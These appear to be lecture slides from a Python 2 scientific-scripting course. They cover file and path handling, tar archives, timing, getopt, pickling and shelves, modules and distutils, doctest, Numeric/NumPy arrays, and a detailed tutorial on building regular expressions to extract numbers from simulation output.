![]() | Given a path, e.g.,
fname = '/home/hpl/scripting/python/intro/hw.py' |
![]() | Extract directory and basename:
# basename: hw.py basename = os.path.basename(fname) # dirname: /home/hpl/scripting/python/intro dirname = os.path.dirname(fname) # or dirname, basename = os.path.split(fname) |
![]() | Extract suffix:
root, suffix = os.path.splitext(fname) # suffix: .py |

![]() | The operating system interface in Python is the same on Unix, Windows and Mac |
![]() | Sometimes you need to perform platform-specific operations, but how can you make a portable script?
# os.name : operating system name
# sys.platform : platform identifier
# cmd: string holding command to be run
if os.name == 'posix': # Unix?
failure, output = commands.getstatusoutput(cmd + '&')
elif sys.platform[:3] == 'win': # Windows?
failure, output = commands.getstatusoutput('start ' + cmd)
else:
# foreground execution:
failure, output = commands.getstatusoutput(cmd)
|

![]() | Run through all files in your home directory and list files that are larger than 1 Mb |
![]() | A Unix find command solves the problem:
find $HOME -name '*' -type f -size +2000 \
-exec ls -s {} \;
|
![]() | This (and all features of Unix find) can be given a cross-platform implementation in Python |

![]() | Similar cross-platform Python tool:
root = os.environ['HOME'] # my home directory os.path.walk(root, myfunc, arg)walks through a directory tree (root) and calls, for each directory dirname, myfunc(arg, dirname, files) # files is list of (local) filenames |
![]() | arg is any user-defined argument, e.g. a nested list of variables |

def checksize1(arg, dirname, files):
for file in files:
# construct the file's complete path:
filename = os.path.join(dirname, file)
if os.path.isfile(filename):
size = os.path.getsize(filename)
if size > 1000000:
print '%.2fMb %s' % (size/1000000.0,filename)
root = os.environ['HOME']
os.path.walk(root, checksize1, None)
# arg is a user-specified (optional) argument,
# here we specify None since arg has no use
# in the present example

| Slight extension of the previous example | |
Now we use the arg variable to build a list during the
walk
def checksize1(arg, dirname, files):
for file in files:
filepath = os.path.join(dirname, file)
if os.path.isfile(filepath):
size = os.path.getsize(filepath)
if size > 1000000:
size_in_Mb = size/1000000.0
arg.append((size_in_Mb, filename))
bigfiles = []
root = os.environ['HOME']
os.path.walk(root, checksize1, bigfiles)
for size, name in bigfiles:
print name, 'is', size, 'Mb'
|

Let's build a tuple of all files instead of a list:
def checksize1(arg, dirname, files):
for file in files:
filepath = os.path.join(dirname, file)
if os.path.isfile(filepath):
size = os.path.getsize(filepath)
if size > 1000000:
msg = '%.2fMb %s' % (size/1000000.0, filepath)
arg = arg + (msg,)
bigfiles = []
os.path.walk(os.environ['HOME'], checksize1, bigfiles)
for size, name in bigfiles:
print name, 'is', size, 'Mb'
| |
| Now bigfiles is an empty list! Why? Explain in detail... (Hint: arg must be mutable) |

| Tar is a widepsread tool for packing file collections efficiently | |
| Very useful for software distribution or sending (large) collections of files in email | |
Demo:
>>> import tarfile
>>> files = 'NumPy_basics.py', 'hw.py', 'leastsquares.py'
>>> tar = tarfile.open('tmp.tar.gz', 'w:gz') # gzip compression
>>> for file in files:
... tar.add(file)
...
>>> # check what's in this archive:
>>> members = tar.getmembers() # list of TarInfo objects
>>> for info in members:
... print '%s: size=%d, mode=%s, mtime=%s' % \
... (info.name, info.size, info.mode,
... time.strftime('%Y.%m.%d', time.gmtime(info.mtime)))
...
NumPy_basics.py: size=11898, mode=33261, mtime=2004.11.23
hw.py: size=206, mode=33261, mtime=2005.08.12
leastsquares.py: size=1560, mode=33261, mtime=2004.09.14
>>> tar.close()
| |
| Compressions: uncompressed (w:), gzip (w:gz), bzip2 (w:bz2) |

>>> tar = tarfile.open('tmp.tar.gz', 'r')
>>>
>>> for file in tar.getmembers():
... tar.extract(file) # extract file to current work.dir.
...
>>> # do we have all the files?
>>> allfiles = os.listdir(os.curdir)
>>> for file in allfiles:
... if not file in files: print 'missing', file
...
>>> hw = tar.extractfile('hw.py') # extract as file object
>>> hw.readlines()

![]() | The time module:
import time e0 = time.time() # elapsed time since the epoch c0 = time.clock() # total CPU time spent so far # do tasks... elapsed_time = time.time() - e0 cpu_time = time.clock() - c0 |
![]() | The os.times function returns a list:
os.times()[0] : user time, current process os.times()[1] : system time, current process os.times()[2] : user time, child processes os.times()[3] : system time, child processes os.times()[4] : elapsed time |
![]() | CPU time = user time + system time |

![]() | Application:
t0 = os.times() # do tasks... os.system(time_consuming_command) # child process t1 = os.times() elapsed_time = t1[4] - t0[4] user_time = t1[0] - t0[0] system_time = t1[1] - t0[1] cpu_time = user_time + system_time cpu_time_system_call = t1[2]-t0[2] + t1[3]-t0[3] |
![]() | There is a special Python profiler for finding bottlenecks in scripts (ranks functions according to their CPU-time consumption) |

![]() | a function to call |
![]() | a list of arguments to the function |
![]() | number of calls to make (repetitions) |
![]() | name of function (for printout) |
def timer(func, args, repetitions, func_name):
t0 = time.time(); c0 = time.clock()
for i in range(repetitions):
func(*args) # old style: apply(func, args)
print '%s: elapsed=%g, CPU=%g' % \
(func_name, time.time()-t0, time.clock()-c0)

![]() | Running through sys.argv[1:] and extracting command-line info 'manually' is easy |
![]() | Using standardized modules and interface specifications is better! |
![]() | Python's getopt and optparse modules parse the command line |
![]() | getopt is the simplest to use |
![]() | optparse is the most sophisticated |

![]() | It is a 'standard' to use either short or long options
-d dirname # short options -d and -h --directory dirname # long options --directory and --help |
![]() | Short options have single hyphen, long options have double hyphen |
![]() | Options can take a value or not:
--directory dirname --help --confirm -d dirname -h -i |
![]() | Short options can be combined
-iddirname is the same as -i -d dirname |

![]() | Specify short options by the option letters, followed by colon if the option requires a value |
![]() | Example: 'id:h' |
![]() | Specify long options by a list of option names, where names must end with = if the require a value |
![]() | Example: ['help','directory=','confirm'] |

![]() | getopt returns a list of (option,value) pairs and a list of the remaining arguments |
![]() | Example:
--directory mydir -i file1 file2makes getopt return
[('--directory','mydir'), ('-i','')]
['file1','file2]'
|

![]() | Processing:
import getopt
try:
options, args = getopt.getopt(sys.argv[1:], 'd:hi',
['directory=', 'help', 'confirm'])
except:
# wrong syntax on the command line, illegal options,
# missing values etc.
directory = None; confirm = 0 # default values
for option, value in options:
if option in ('-h', '--help'):
# print usage message
elif option in ('-d', '--directory'):
directory = value
elif option in ('-i', '--confirm'):
confirm = 1
|

![]() | Equivalent command-line arguments:
-d mydir --confirm src1.c src2.c --directory mydir -i src1.c src2.c --directory=mydir --confirm src1.c src2.c |
![]() | Abbreviations of long options are possible, e.g.,
--d mydir --co |
![]() | This one also works: -idmydir |

![]() | Write nested lists:
somelist = ['text1', 'text2']
a = [[1.3,somelist], 'some text']
f = open('tmp.dat', 'w')
# convert data structure to its string repr.:
f.write(str(a))
f.close()
|
![]() | Equivalent statements writing to standard output:
print a sys.stdout.write(str(a) + '\n') # sys.stdin standard input as file object # sys.stdout standard input as file object |

![]() | eval(s): treat string s as Python code |
![]() | a = eval(str(a)) is a valid 'equation' for basic Python data structures |
![]() | Example: read nested lists
f = open('tmp.dat', 'r') # file written in last slide
# evaluate first line in file as Python code:
newa = eval(f.readline())
results in
[[1.3, ['text1', 'text2']], 'some text'] # i.e. newa = eval(f.readline()) # is the same as newa = [[1.3, ['text1', 'text2']], 'some text'] |

![]() | str(a) is implemented as an object function
__str__ |
![]() | repr(a) is implemented as an object function
__repr__ |
![]() | str(a): pretty print of an object |
![]() | repr(a): print of all info for use with eval |
![]() | a = eval(repr(a)) |
![]() | str and repr are identical for standard Python objects (lists, dictionaries, numbers) |

![]() | Many programs need to have persistent data structures, i.e., data live after the program is terminated and can be retrieved the next time the program is executed |
![]() | str, repr and eval are convenient for making data structures persistent |
![]() | pickle, cPickle and shelve are other (more sophisticated) Python modules for storing/loading objects |

![]() | Write any set of data structures to file using
the cPickle module:
f = open(filename, 'w') import cPickle cPickle.dump(a1, f) cPickle.dump(a2, f) cPickle.dump(a3, f) f.close() |
![]() | Read data structures in again later:
f = open(filename, 'r') a1 = cPickle.load(f) a2 = cPickle.load(f) a3 = cPickle.load(f) |

![]() | Think of shelves as dictionaries with file storage
import shelve
database = shelve.open(filename)
database['a1'] = a1 # store a1 under the key 'a1'
database['a2'] = a2
database['a3'] = a3
# or
database['a123'] = (a1, a2, a3)
# retrieve data:
if 'a1' in database:
a1 = database['a1']
# and so on
# delete an entry:
del database['a2']
database.close()
|

>>> a = 3 # a refers to int object with value 3 >>> b = a # b refers to a (int object with value 3) >>> id(a), id(b ) # print integer identifications of a and b (135531064, 135531064) >>> id(a) == id(b) # same identification? True # a and b refer to the same object >>> a is b # alternative test True >>> a = 4 # a refers to a (new) int object >>> id(a), id(b) # let's check the IDs (135532056, 135531064) >>> a is b False >>> b # b still refers to the int object with value 3 3

>>> a = [2, 6] # a refers to a list [2, 6] >>> b = a # b refers to the same list as a >>> a is b True >>> a = [1, 6, 3] # a refers to a new list >>> a is b False >>> b # b still refers to the old list [2, 6] >>> a = [2, 6] >>> b = a >>> a[0] = 1 # make in-place changes in a >>> a.append(3) # another in-place change >>> a [1, 6, 3] >>> b [1, 6, 3] >>> a is b # a and b refer to the same list object True

![]() | What if we want b to be a copy of a? |
![]() | Lists: a[:] extracts a slice, which is a copy of all
elements:
>>> b = a[:] # b refers to a copy of elements in a >>> b is a FalseIn-place changes in a will not affect b |
![]() | Dictionaries: use the copy method:
>>> a = {'refine': False}
>>> b = a.copy()
>>> b is a
False
In-place changes in a will not affect b
|

![]() | Parnassus is a large collection of Python modules, see link from www.python.org |
![]() | Do not reinvent the wheel, search Parnassus! |


![]() | Making a module |
![]() | Making Python aware of modules |
![]() | Packages |
![]() | Distributing and installing modules |

![]() | Appendix B.1 in the course book |
![]() | Python electronic documentation: Distributing Python Modules, Installing Python Modules |

![]() | Reuse scripts by wrapping them in classes or functions |
![]() | Collect classes and functions in library modules |
![]() | How? just put classes and functions in a file MyMod.py |
![]() | Put MyMod.py in one of the directories where Python can find it (see next slide) |
![]() | Say
import MyMod # or import MyMod as M # M is a short form # or from MyMod import * # or from MyMod import myspecialfunction, myotherspecialfunctionin any script |

![]() | Python has some 'official' module directories, typically
/usr/lib/python2.3 /usr/lib/python2.3/site-packages+ current working directory |
![]() | The environment variable PYTHONPATH may contain additional directories with modules
unix> echo $PYTHONPATH /home/me/python/mymodules:/usr/lib/python2.2:/home/you/yourlibs |
![]() | Python's sys.path list contains the directories where Python searches for modules |
![]() | sys.path contains 'official' directories, plus those in PYTHONPATH) |

![]() | In a Unix Bash environment environment variables are normally
set in .bashrc:
export PYTHONTPATH=$HOME/pylib:$scripting/src/tools |
![]() | Check the contents:
unix> echo $PYTHONPATH |
![]() | In a Windows environment one can do the same in autoexec.bat:
set PYTHONPATH=C:\pylib;%scripting%\src\tools |
![]() | Check the contents:
dos> echo %PYTHONPATH% |
![]() | Note: it is easy to make mistakes; PYTHONPATH may be different from what you think, so check sys.path |

![]() | Copy your module file(s) to a directory already contained in sys.path
unix or dos> python -c 'import sys; print sys.path' |
![]() | Can extend PYTHONPATH
# Bash syntax: export PYTHONPATH=$PYTHONPATH:/home/me/python/mymodules |
![]() | Can extend sys.path in the script:
sys.path.insert(0, '/home/me/python/mynewmodules')(insert first in the list) |

![]() | A class of modules can be collected in a package |
![]() | Normally, a package is organized as module files in a directory tree |
![]() | Each subdirectory has a file __init__.py (can be empty) |
![]() | Packages allow ``dotted modules names'' like
MyMod.numerics.pde.gridsreflecting a file MyMod/numerics/pde/grids.py |

![]() | Can import modules in the tree like this:
from MyMod.numerics.pde.grids import fdm_grids grid = fdm_grids() grid.domain(xmin=0, xmax=1, ymin=0, ymax=1) ...Here, class fdm_grids is in module grids (file grids.py) in the directory MyMod/numerics/pde |
![]() | Or
import MyMod.numerics.pde.grids grid = MyMod.numerics.pde.grids.fdm_grids() grid.domain(xmin=0, xmax=1, ymin=0, ymax=1) #or import MyMod.numerics.pde.grids as Grid grid = Grid.fdm_grids() grid.domain(xmin=0, xmax=1, ymin=0, ymax=1) |
![]() | See ch. 6 of the Python Tutorial (part of the electronic doc) |

![]() | Module files can have a test/demo script at the end:
if __name__ == '__main__':
infile = sys.argv[1]; outfile = sys.argv[2]
for i in sys.argv[3:]:
create(infile, outfile, i)
|
![]() | The block is executed if the module file is run as a script |
![]() | The tests at the end of a module often serve as good examples on the usage of the module |

![]() | Python convention: add a leading underscore to non-public functions and (module) variables
_counter = 0
def _filename():
"""Generate a random filename."""
...
|
![]() | After a standard import import MyMod, we may access
MyMod._counter n = MyMod._filename()but after a from MyMod import * the names with leading underscore are not available |
![]() | Use the underscore to tell users what is public and what is not |
![]() | Note: non-public parts can be changed in future releases |

![]() | Python has its own build/installation system: Distutils |
![]() | Build: compile (Fortran, C, C++) into module (only needed when modules employ compiled code) |
![]() | Installation: copy module files to ``install'' directories |
![]() | Publish: make module available for others through PyPi |
![]() | Default installation directory:
os.path.join(sys.prefix, 'lib', 'python' + sys.version[0:3],
'site-packages')
# e.g. /usr/lib/python2.3/site-packages
|
![]() | Distutils relies on a setup.py script |

![]() | Say we want to distribute two modules in two files
MyMod.py mymodcore.py |
![]() | Typical setup.py script for this case:
#!/usr/bin/env python
from distutils.core import setup
setup(name='MyMod',
version='1.0',
description='Python module example',
author='Hans Petter Langtangen',
author_email='hpl@ifi.uio.no',
url='http://www.simula.no/pymod/MyMod',
py_modules=['MyMod', 'mymodcore'],
)
|

![]() | Modules can also make use of Fortran, C, C++ code |
![]() | setup.py can also list C and C++ files; these will be compiled with the same options/compiler as used for Python itself |
![]() | SciPy has an extension of Distutils for ``intelligent'' compilation of Fortran files |
![]() | Note: setup.py eliminates the need for makefiles |
![]() | Examples of such setup.py files are provided in the section on mixing Python with Fortran, C and C++ |

![]() | Standard command:
python setup.py install |
![]() | If the module contains files to be compiled, a two-step procedure can be invoked
python setup.py build # compiled files and modules are made in subdir. build/ python setup.py install |

![]() | setup.py has many options |
![]() | Control the destination directory for installation:
python setup.py install --home=$HOME/install # copies modules to /home/hpl/install/lib/python |
![]() | Make sure that /home/hpl/install/lib/python is registered in your PYTHONPATH |

![]() | Go to the official electronic Python documentation |
![]() | Look up ``Distributing Python Modules'' (for packing modules in setup.py scripts) |
![]() | Look up ``Installing Python Modules'' (for running setup.py with various options) |


| How to document usage of Python functions, classes, modules | |
| Automatic testing of code (through doc strings) |

![]() | App. B.1/B.2 in the course book |
![]() | HappyDoc, Pydoc, Epydoc manuals |
![]() | Style guide for doc strings (see doc.html) |

![]() | Doc strings = first string in functions, classes, files |
![]() | Put user information in doc strings:
def ignorecase_sort(a, b):
"""Compare strings a and b, ignoring case."""
...
|
![]() | The doc string is available at run time and explains the purpose and usage of the function:
>>> print ignorecase_sort.__doc__ 'Compare strings a and b, ignoring case.' |

![]() | Doc string in a class:
class MyClass:
"""Fake class just for exemplifying doc strings."""
def __init__(self):
...
|
![]() | Doc strings in modules are a (often multi-line) string starting in the top of the file
""" This module is a fake module for exemplifying multi-line doc strings. """ |

![]() | The doc string serves two purposes:
| ||||||
![]() | HappyDoc: Tool that can extract doc strings and automatically produce overview of Python classes, functions etc. | ||||||
![]() | Doc strings can, e.g., be used as balloon help in sophisticated GUIs (cf. IDLE) | ||||||
![]() | Providing doc strings is a good habit! |

![]() | PEP 257 "Docstring Conventions" from http://www.python.org/dev/peps/ |
![]() | Use triple double quoted strings as doc strings |
![]() | Use complete sentences, ending in a period
def somefunc(a, b):
"""Compare a and b."""
|

![]() | The doctest module enables automatic testing of interactive Python sessions embedded in doc strings
class StringFunction:
"""
Make a string expression behave as a Python function
of one variable.
Examples on usage:
>>> from StringFunction import StringFunction
>>> f = StringFunction('sin(3*x) + log(1+x)')
>>> p = 2.0; v = f(p) # evaluate function
>>> p, v
(2.0, 0.81919679046918392)
>>> f = StringFunction('1+t', independent_variables='t')
>>> v = f(1.2) # evaluate function of t=1.2
>>> print "%.2f" % v
2.20
>>> f = StringFunction('sin(t)')
>>> v = f(1.2) # evaluate function of t=1.2
Traceback (most recent call last):
v = f(1.2)
NameError: name 't' is not defined
"""
|

![]() | Class StringFunction is contained in the module StringFunction |
![]() | Let StringFunction.py execute two statements when run as a script:
def _test():
import doctest, StringFunction
return doctest.testmod(StringFunction)
if __name__ == '__main__':
_test()
|
![]() | Run the test:
python StringFunction.py # no output: all tests passed python StringFunction.py -v # verbose output |


![]() | Efficient array computing in Python |
![]() | Creating arrays |
![]() | Indexing/slicing arrays |
![]() | Random numbers |
![]() | Linear algebra |

![]() | Ch. 4 in the course book |
![]() | Numeric, numarray, or numpy manual |

![]() | NumPy enables efficient numerical computing in Python |
![]() | NumPy is a Python/C package which offers efficient arrays (contiguous storage) and mathematical operations in C |
![]() | Classic and widely used Numeric module:
from Numeric import * |
![]() | Numarray alternative:
from numarray import * |
![]() | numpy - a third ``replacement'' implementation:
from numpy import * |
![]() | Numerical Python contains other modules as well - these have slightly different names and features in the three implementations :-( |

![]() | Most probably we will have to live with three implementations |
![]() | We have made a small interface layer (module) numpytools and added some extra functions
from py4cs.numpytools import * |
![]() | This module allows a unified interface to Numeric, numarray, and numpy - based on recommending ``the least common denominator'' principle (use only functionality that are present in all three packages) |

from py4cs.numpytools import * # or from Numeric import * # or from numpy import * # create an array a of length n, with zeroes and # double precision float type: a = zeros(n, Float) # create an array x with values from -5 to 4.5 in steps of 0.5: x = arrayrange(-5, 5, 0.5, Float) # better: use sequence from py4cs.numpytools (5 is included): x = sequence(-5, 5, 0.5) # -5, -4.5, ..., 5.0 # it is trivial to make accompanying y values: y = sin(x/2.0)*3.0 # create a NumPy array from a Python list: pl = [0, 1.2, 4, -9.1, 5, 8] a = array(pl, typecode=Float) # (can omit typecode) a.shape = (2,3) # turn a into a 2x3 matrix a.shape = (size(a),) # back to vector

b = 3*a - 1 # in-place (memory saving) alternative: b = a multiply(b, 3, b) # b = 3*b subtract(b, 1, b) # b = b -1 # standard mathematical functions: c = sin(b) c = arcsin(c) c = sinh(b) c = b**2.5 # power function c = log(b) c = sqrt(b) # subscripting: a[2:4] = -1 # set a[2] and a[3] to -1 a[-1] = a[0] # set last element equal to first one a.shape = (3,2) print a[:,0] # print first column print a[:,1::2] # print second column with stride 2

![]() | arange and arrayrange (synonym) are supposed not to include the upper limit (like range and xrange) |
![]() | Try out
nerrors = 0
for n in range(1, 101):
x1 = arange(0, 1, 1./n)[-1] # should be less than 1
print n, x1
if x1 == 1.0: nerrors += 1
print 'leading to', nerrors, 'unexpected cases'
|
![]() | 58 (random!) cases out of 100 gave unexpected behavior! |

![]() | Stay away from arange and arrayrange, use
seq (or emp{sequence}) and iseq (or isequence)
from numpytools instead:
from py4cs.numpytools import * x = seq(0, 1, 1./n) I = iseq(0, 100, 2) # includes 100 |
![]() | numpy.linspace is a similar alternative |

from Numeric import *
RandomArray.seed(1928,1277) # set seed
# seed() provides a seed based on current time
print 'mean of %d random uniform random numbers:' % n
u = RandomArray.random(n) # uniform numbers on (0,1)
print 'on (0,1):', sum(u)/n, '(should be 0.5)'
u = RandomArray.uniform(-1,1,n) # uniform numbers on (-1,1)
print 'on (-1,1):', sum(u)/n, '(should be 0)'
mean = 0.0; stdev = 1.0
u = RandomArray.normal(mean, stdev, n)
m = sum(u)/n # empirical mean
s = sqrt(sum((u - m)**2)/(n-1)) # empirical st.dev.
print 'generated %d N(0,1) samples with\nmean %g '\
'and st.dev. %g using RandomArray.normal' % (n, m, s)

![]() | Continuation of last slide |
![]() | Find the probability that normal samples are less than 1.5:
u = RandomArray.normal(mean, stdev, n) less_than = u < 1.5 # (less_than[i] is 1 if u[i]<0, otherwise 0, i.e. # less_than is an array like (0,0,1,1,0,0,1,0,...0,1,0) p = sum(less_than) prob = p/float(n) print "probability=%.2f" % prob |
![]() | Vectorized operations give high efficiency, but requires a different way of thinking |

![]() |
A Python module, pymat, enables communication with Matlab:
from Numeric import * import pymat x = arrayrange(0, 4*math.pi, 0.1) m = pymat.open() # can send NumPy arrays to Matlab: pymat.put(m, 'x', x); pymat.eval(m, 'y = sin(x)') pymat.eval(m, 'plot(x,y)') # get a new NumPy array back: y = pymat.get(m, 'y') |


![]() | Motivation for regular expression |
![]() | Regular expression syntax |
![]() | Lots of examples on problem solving with regular expressions |
![]() | Many examples related to scientific computations |

![]() | Ch. 8.2 in the course book |
![]() | Regular Expression HOWTO for Python (see doc.html) |
![]() | perldoc perlrequick (intro), perldoc perlretut (tutorial), perldoc perlre (full reference) |
![]() | ``Text Processing in Python'' by Mertz (Python syntax) |
![]() | ``Mastering Regular Expressions'' by Friedl (Perl syntax) |
![]() | Note: the core syntax is the same in Perl, Python, Ruby, Tcl, Egrep, Vi/Vim, Emacs, ..., so books about these tools also provide info on regular expressions |

![]() | Consider a simulation code with this type of output:
t=2.5 a: 1.0 6.2 -2.2 12 iterations and eps=1.38756E-05 t=4.25 a: 1.0 1.4 6 iterations and eps=2.22433E-05 >> switching from method AQ4 to AQP1 t=5 a: 0.9 2 iterations and eps=3.78796E-05 t=6.386 a: 1.0 1.1525 6 iterations and eps=2.22433E-06 >> switching from method AQP1 to AQ2 t=8.05 a: 1.0 3 iterations and eps=9.11111E-04 ... | ||||
![]() | You want to make two graphs:
| ||||
![]() | How can you extract the relevant numbers from the text? |

![]() | Some structure in the text, but line.split() is too simple (different no of columns/words in each line) |
![]() | Regular expressions constitute a powerful language for formulating structure and extract parts of a text |
![]() | Regular expressions look cryptic for the novice |
![]() | regex/regexp: abbreviations for regular expression |

t=6.386 a: 1.0 1.1525 6 iterations and eps=2.22433E-06
![]() | Structure: t=, number, 2 blanks, a:, some numbers, 3 blanks, integer, ' iterations and eps=', number |
![]() | Regular expressions constitute a language for specifying such structures |
![]() | Formulation in terms of a regular expression:
t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
|

![]() |
A regex usually contains special characters introducing freedom in the text:
t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
t=6.386 a: 1.0 1.1525 6 iterations and eps=2.22433E-06
. any character
.* zero or more . (i.e. any sequence of characters)
(.*) can extract the match for .* afterwards
\s whitespace (spacebar, newline, tab)
\s{2} two whitespace characters
a: exact text
.* arbitrary text
\s+ one or more whitespace characters
\d+ one or more digits (i.e. an integer)
(\d+) can extract the integer later
iterations and eps= exact text
|

pattern = \
r"t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)"
t = []; iterations = []; eps = []
# the output to be processed is stored in the list of lines
for line in lines:
match = re.search(pattern, line)
if match:
t.append (float(match.group(1)))
iterations.append(int (match.group(2)))
eps.append (float(match.group(3)))

![]() | Output text to be interpreted:
t=2.5 a: 1 6 -2 12 iterations and eps=1.38756E-05 t=4.25 a: 1.0 1.4 6 iterations and eps=2.22433E-05 >> switching from method AQ4 to AQP1 t=5 a: 0.9 2 iterations and eps=3.78796E-05 t=6.386 a: 1 1.15 6 iterations and eps=2.22433E-06 >> switching from method AQP1 to AQ2 t=8.05 a: 1.0 3 iterations and eps=9.11111E-04 |
![]() | Extracted Python lists:
t = [2.5, 4.25, 5.0, 6.386, 8.05]
iterations = [12, 6, 2, 6, 3]
eps = [1.38756e-05, 2.22433e-05, 3.78796e-05,
2.22433e-06, 9.11111E-04]
|

![]() | Consider the regex
t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)compared with the previous regex
t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
|
![]() | Less structure |
![]() | How 'exact' does a regex need to be? |
![]() | The degree of preciseness depends on the probability of making a wrong match |

![]() | Suppose we change the regular expression to
t=(.*)\s+a:.*(\d+).*=(.*) |
![]() | It works on most lines in our test text but not on
t=2.5 a: 1 6 -2 12 iterations and eps=1.38756E-05 |
![]() | 2 instead of 12 (iterations) is extracted (why? see later) |
![]() | Regular expressions constitute a powerful tool, but you need to develop understanding and experience |

. # any single character except a newline ^ # the beginning of the line or string $ # the end of the line or string * # zero or more of the last character + # one or more of the last character ? # zero or one of the last character [A-Z] # matches all upper case letters [abc] # matches either a or b or c [^b] # does not match b [^a-z] # does not match lower case letters

.* # any sequence of characters (except newline) [.*] # the characters . and * ^no # the string 'no' at the beginning of a line [^no] # neither n nor o A-Z # the 3-character string 'A-Z' (A, minus, Z) [A-Z] # one of the chars A, B, C, ..., X, Y, or Z

![]() | The OR operator:
(eg|le)gs # matches eggs or legs |
![]() | Short forms of common expressions:
\n # a newline
\t # a tab
\w # any alphanumeric (word) character
# the same as [a-zA-Z0-9_]
\W # any non-word character
# the same as [^a-zA-Z0-9_]
\d # any digit, same as [0-9]
\D # any non-digit, same as [^0-9]
\s # any whitespace character: space,
# tab, newline, etc
\S # any non-whitespace character
\b # a word boundary, outside [] only
\B # no word boundary
|

\. # a dot
\| # vertical bar
\[ # an open square bracket
\) # a closing parenthesis
\* # an asterisk
\^ # a hat
\/ # a slash
\\ # a backslash
\{ # a curly brace
\? # a question mark


The part of the string that matches the regex is high-lighted

![]() | Different ways of writing real numbers: -3, 42.9873, 1.23E+1, 1.2300E+01, 1.23e+01 | ||||||
![]() | Three basic forms:
|

![]() | Could just collect the legal characters in the three notations:
[0-9.Ee\-+]+ |
![]() | Downside: this matches text like
12-24 24.- --E1-- +++++ |
![]() | How can we define precise regular expressions for the three notations? |

![]() | Regex for decimal notation:
-?\d*\.\d+ # or equivalently (\d is [0-9]) -?[0-9]*\.[0-9]+ |
![]() | Problem: this regex does not match '3.' |
![]() | The fix
-?\d*\.\d*is ok but matches text like '-.' and (much worse!) '.' |
![]() | Trying it on
'some text. 4. is a number.'gives a match for the first period! |

![]() | We need a digit before OR after the dot |
![]() | The fix:
-?(\d*\.\d+|\d+\.\d*) |
![]() | A more compact version (just "OR-ing" numbers without digits after the dot):
-?(\d*\.\d+|\d+\.) |

![]() | Make a regex for integer or decimal notation:
(integer OR decimal notation)using the OR operator and parenthesis: -?(\d+|(\d+\.\d*|\d*\.\d+)) |
![]() | Problem: 22.432 gives a match for 22 (i.e., just digits? yes - 22 - match!) |

![]() | Remedy: test for the most complicated pattern first
(decimal notation OR integer) -?((\d+\.\d*|\d*\.\d+)|\d+) |
![]() | Modularize the regex:
real_in = r'\d+'
real_dn = r'(\d+\.\d*|\d*\.\d+)'
real = '-?(' + real_dn + '|' + real_in + ')'
|

![]() | Write a regex for numbers in scientific notation |
![]() | Typical text: 1.27635E+01, -1.27635e+1 |
![]() | Regular expression:
-?\d\.\d+[Ee][+\-]\d\d? |
![]() | = optional minus, one digit, dot, at least one digit, E or e, plus or minus, one digit, optional digit |

![]() | Problem: 1e+00 and 1e1 are not handled |
![]() | Remedy: zero or more digits behind the dot, optional e/E, optional sign in exponent, more digits in the exponent (1e001):
-?\d\.?\d*[Ee][+\-]?\d+ |

![]() | A pattern for integer or decimal notation:
-?((\d+\.\d*|\d*\.\d+)|\d+) |
![]() | Can get rid of an OR by allowing the dot and digits behind the dot be optional:
-?(\d+(\.\d*)?|\d*\.\d+) |
![]() | Such a number, followed by an optional exponent (a la e+02), makes up a general real number (!)
-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)? |

![]() | Scientific OR decimal OR integer notation:
-?(\d\.?\d*[Ee][+\-]?\d+|(\d+\.\d*|\d*\.\d+)|\d+)or better (modularized):
real_in = r'\d+'
real_dn = r'(\d+\.\d*|\d*\.\d+)'
real_sn = r'(\d\.?\d*[Ee][+\-]?\d+'
real = '-?(' + real_sn + '|' + real_dn + '|' + real_in + ')'
|
![]() | Note: first test on the most complicated regex in OR expressions |

![]() | Enclose parts of a regex in () to extract the parts:
pattern = r"t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)" # groups: ( ) ( ) ( )This defines three groups (t, iterations, eps) |
![]() | In Python code:
match = re.search(pattern, line)
if match:
time = float(match.group(1))
iter = int (match.group(2))
eps = float(match.group(3))
|
![]() | The complete match is group 0 (here: the whole line) |

![]() | Aim: extract lower and upper limits of an interval:
[ -3.14E+00, 29.6524] |
![]() | Structure: bracket, real number, comma, real number, bracket, with embedded whitespace |

![]() | Regex for real numbers is a bit complicated |
![]() | Simpler: integer limits
pattern = r'\[\d+,\d+\]'but this does must be fixed for embedded white space or negative numbers a la [ -3 , 29 ] |
![]() | Remedy:
pattern = r'\[\s*-?\d+\s*,\s*-?\d+\s*\]' |
![]() | Introduce groups to extract lower and upper limit:
pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]' |

>>> pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]'
>>> s = "here is an interval: [ -3, 100] ..."
>>> m = re.search(pattern, s)
>>> m.group(0)
[ -3, 100]
>>> m.group(1)
-3
>>> m.group(2)
100
>>> m.groups() # tuple of all groups
('-3', '100')

![]() | Many groups? inserting a group in the middle changes other group numbers... |
![]() | Groups can be given logical names instead |
![]() | Standard group notation for interval:
# apply integer limits for simplicity: [int,int] \[\s*(-?\d+)\s*,\s*(-?\d+)\s*\] |
![]() | Using named groups:
\[\s*(?P<lower>-?\d+)\s*,\s*(?P<upper>-?\d+)\s*\] |
![]() | Extract groups by their names:
match.group('lower')
match.group('upper')
|

![]() | Interval with general real numbers:
real_short = r'\s*(-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*' interval = r"\[" + real_short + "," + real_short + r"\]" |
![]() | Example:
>>> m = re.search(interval, '[-100,2.0e-1]')
>>> m.groups()
('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
i.e., lots of (nested) groups; only group 1 and 5 are of interest
|

![]() | Real limits, previous regex resulted in the groups
('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
|
![]() | Downside: many groups, difficult to count right |
![]() | Remedy 1: use named groups for the outer left and outer right
groups:
real1 = \
r"\s*(?P<lower>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
real2 = \
r"\s*(?P<upper>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
interval = r"\[" + real1 + "," + real2 + r"\]"
...
match = re.search(interval, some_text)
if match:
lower_limit = float(match.group('lower'))
upper_limit = float(match.group('upper'))
|

![]() | Remedy 2: reduce the use of groups |
